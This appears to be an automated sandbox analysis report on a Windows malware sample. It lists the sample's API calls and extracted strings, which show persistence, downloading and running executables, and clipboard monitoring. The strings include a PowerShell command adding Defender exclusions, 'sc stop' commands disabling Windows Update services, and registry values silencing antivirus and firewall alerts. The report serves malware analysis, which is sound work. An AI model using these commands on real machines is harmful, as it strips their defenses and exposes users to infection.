                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                    • Opcode ID: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                    • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                    • Opcode Fuzzy Hash: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                    • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                    • Opcode ID: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
                                                                                                                                    • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                    • Opcode Fuzzy Hash: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
                                                                                                                                    • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                    Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                    • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                    • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                    Function 00407940 Relevance: 287.7, APIs: 103, Strings: 61, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 6 407dcb-407df6 RegOpenKeyExW 3->6 7 407d9f-407dc5 RegSetValueExW RegCloseKey 3->7 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 6->8 9 407df8-407e1e RegSetValueExW RegCloseKey 6->9 7->6 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 15 407ed6-407f01 RegOpenKeyExW 12->15 16 407eaa-407ed0 RegSetValueExW RegCloseKey 12->16 17 407b36-407b78 Sleep wsprintfW CopyFileW 14->17 18 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->18 19 407f03-407f29 RegSetValueExW RegCloseKey 15->19 20 407f2f-407f5a RegOpenKeyExW 15->20 16->15 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 17->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 17->23 18->17 21 407ac8-407afb wcslen RegSetValueExW 18->21 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 32 407cc3-407cf6 wcslen RegSetValueExW 24->32 34 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->34 35 40801f-40804a RegOpenKeyExW 25->35 26->25 27->17 28->27 44 407b21-407b23 ExitProcess 28->44 30 407c1b-407c22 RegCloseKey 29->30 31 407bef-407c11 RegCloseKey call 40f400 29->31 30->22 31->30 49 407c13-407c15 ExitProcess 31->49 37 407d24-407d2b RegCloseKey 32->37 38 407cf8-407d1a RegCloseKey call 40f400 32->38 34->35 40 408050-4080d3 RegSetValueExW * 4 RegCloseKey 35->40 41 4080d9-408104 RegOpenKeyExW 35->41 37->3 38->37 52 407d1c-407d1e ExitProcess 38->52 40->41 45 4081f0-40821b RegOpenKeyExW 41->45 46 40810a-4081ea RegSetValueExW * 7 RegCloseKey 41->46 47 408221-408301 RegSetValueExW * 7 RegCloseKey 45->47 48 408307-40831c Sleep call 40d180 45->48 46->45 47->48 54 408491-40849a 48->54 55 408322-40847b WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 48->55 79 408480-40848e call 40de90 55->79 79->54
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040794E
                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                    • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000105), ref: 004079B2
                                                                                                                                    • PathFindFileNameW.SHLWAPI(C:\Windows\sysppvrdnvs.exe), ref: 004079BD
                                                                                                                                    • wsprintfW.USER32 ref: 004079DA
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                    • wcscmp.NTDLL ref: 00407A13
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysppvrdnvs.exe$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                    • API String ID: 4172876685-2793809833
                                                                                                                                    • Opcode ID: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                    • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                    • Opcode Fuzzy Hash: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                    • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C
                                                                                                                                    Function 0040F560 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                    • srand.MSVCRT ref: 0040F570
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                    • strlen.NTDLL ref: 0040F59A
                                                                                                                                    • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                    • rand.MSVCRT ref: 0040F5B9
                                                                                                                                    • rand.MSVCRT ref: 0040F5CD
                                                                                                                                    • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                    • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                    • rand.MSVCRT ref: 0040F7B5
                                                                                                                                    • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                    • rand.MSVCRT ref: 0040F7CC
                                                                                                                                    • rand.MSVCRT ref: 0040F7E0
                                                                                                                                    • wsprintfW.USER32 ref: 0040F807
                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                    • wsprintfW.USER32 ref: 0040F844
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                    • String ID: y@$%s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 1632876846-3348571888
                                                                                                                                    • Opcode ID: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                    • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                    • Opcode Fuzzy Hash: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                    • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                    Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 114 40b850-40b867 call 40b780 117 40b869 114->117 118 40b86e-40b88a call 40b3d0 strcmp 114->118 119 40baf5-40baf8 117->119 122 40b891-40b8ad call 40b3d0 strstr 118->122 123 40b88c 118->123 126 40b8f0-40b90c call 40b3d0 strstr 122->126 127 40b8af-40b8cb call 40b3d0 strstr 122->127 123->119 134 40b90e-40b92a call 40b3d0 strstr 126->134 135 40b94f-40b96b call 40b3d0 strstr 126->135 132 40b8eb 127->132 133 40b8cd-40b8e9 call 40b3d0 strstr 127->133 132->119 133->126 133->132 144 40b94a 134->144 145 40b92c-40b948 call 40b3d0 strstr 134->145 142 40b96d-40b989 call 40b3d0 strstr 135->142 143 40b9ae-40b9c4 EnterCriticalSection 135->143 154 40b9a9 142->154 155 40b98b-40b9a7 call 40b3d0 strstr 142->155 147 40b9cf-40b9d8 143->147 144->119 145->135 145->144 150 40ba09-40ba14 call 40bb00 147->150 151 40b9da-40b9ea 147->151 163 40baea-40baef LeaveCriticalSection 150->163 164 40ba1a-40ba28 150->164 156 40ba07 151->156 157 40b9ec-40ba05 call 40df20 151->157 154->119 155->143 155->154 156->147 157->150 163->119 166 40ba2a 164->166 167 40ba2e-40ba3f call 40a740 164->167 166->167 167->163 170 40ba45-40ba62 call 40df20 167->170 173 40ba64-40ba74 170->173 174 40baba-40bad2 170->174 176 40ba80-40bab8 call 40ab60 173->176 177 40ba76-40ba7e Sleep 173->177 175 40bad8-40bae3 call 40bb00 174->175 175->163 182 40bae5 call 40b530 175->182 176->175 177->173 182->163
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                      • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                    • strcmp.NTDLL ref: 0040B880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                    • Opcode ID: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
                                                                                                                                    • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                    • Opcode Fuzzy Hash: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
                                                                                                                                    • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                    Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 184 4059b0-4059d2 GetWindowLongW 185 4059d4-4059db 184->185 186 4059f6-4059fd 184->186 189 4059e1-4059e5 185->189 190 405a67-405a78 IsClipboardFormatAvailable 185->190 187 405a26-405a2c 186->187 188 4059ff 186->188 192 405a46-405a4a 187->192 193 405a2e-405a44 SetWindowLongW 187->193 191 405be4-405bfd DefWindowProcA 188->191 196 405a04-405a21 SetClipboardViewer SetWindowLongW 189->196 197 4059e7-4059eb 189->197 194 405a83-405a8d IsClipboardFormatAvailable 190->194 195 405a7a-405a81 190->195 198 405a62 192->198 199 405a4c-405a5c SendMessageA 192->199 193->198 201 405a98-405aa2 IsClipboardFormatAvailable 194->201 202 405a8f-405a96 194->202 200 405aab-405aaf 195->200 196->191 203 4059f1 197->203 204 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 197->204 198->191 199->198 206 405ab5-405abf OpenClipboard 200->206 207 405b7f-405b83 200->207 201->200 205 405aa4 201->205 202->200 203->191 204->191 205->200 206->207 210 405ac5-405ad6 GetClipboardData 206->210 208 405b85-405b95 SendMessageA 207->208 209 405b9b 207->209 208->209 209->191 211 405ad8 210->211 212 405add-405aee GlobalLock 210->212 211->191 213 405af0 212->213 214 405af5-405b06 212->214 213->191 215 405b08-405b0c 214->215 216 405b29-405b3c call 40d250 214->216 217 405b3e-405b4e call 4057f0 215->217 218 405b0e-405b12 215->218 224 405b51-405b65 GlobalUnlock CloseClipboard 216->224 217->224 220 405b14 218->220 221 405b16-405b27 call 405680 218->221 220->224 221->224 224->207 227 405b67-405b7c call 404970 call 40ab60 224->227 227->207
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                    • Opcode ID: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
                                                                                                                                    • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                    • Opcode Fuzzy Hash: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
                                                                                                                                    • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                    Function 00406F70 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106sleepthreadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000104), ref: 00406F90
                                                                                                                                      • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                      • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                      • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                      • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                      • Part of subcall function 004063E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                      • Part of subcall function 004063E0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                      • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                      • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                    • wsprintfW.USER32 ref: 00407072
                                                                                                                                    • wsprintfW.USER32 ref: 00407092
                                                                                                                                    • wsprintfW.USER32 ref: 004070B5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysppvrdnvs.exe$Unnamed volume
                                                                                                                                    • API String ID: 1650488544-747518629
                                                                                                                                    • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                    • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                    Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
